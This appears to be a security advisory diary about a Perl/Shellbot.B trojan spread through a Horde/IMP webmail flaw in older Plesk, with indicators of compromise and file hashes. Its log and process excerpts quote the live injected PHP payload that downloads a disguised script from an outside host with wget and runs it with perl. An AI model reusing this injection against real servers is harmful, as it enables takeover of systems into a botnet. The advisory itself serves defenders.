ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png[1]. The trojan has limited detection on Virustotal [2] and the script contains a “hostauth” of sosick[.]net[3] and the IRC server where the compromised systems are connecting to is located at 89.248.172.144. What we have so far, it appears it is exploiting older version of Plesk.

Update

This Bot exploit a vulnerability in Horde/IMP Plesk webmail, you might want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info which appears to be exploiting a Plesk [4] vulnerability and maybe other to connect to 93.174.88.125 which a lot of activity has been reported to DShield for the past 3 days.

Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 93.174.88.125 to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

If a system is compromised, you are likely going to see similar Apache processes:

apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*
apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget http://fallencrafts.info/download/himad.png

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png

[1] https://dns.robtex.com/fallencrafts.info.html#graph
[2] https://www.virustotal.com/en/url/79654fc688b48211ccc24a14d815c41dba0b1dfbefc2c51d38ed88b481242e9b/analysis/1382747124/
[3] https://dns.robtex.com/sosick.net.html#records
[4] http://kb.parallels.com/en/113374
[5] http://kb.parallels.com/en/116241
[6] https://isc.sans.edu/ipdetails.html?ip=93.174.88.125

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu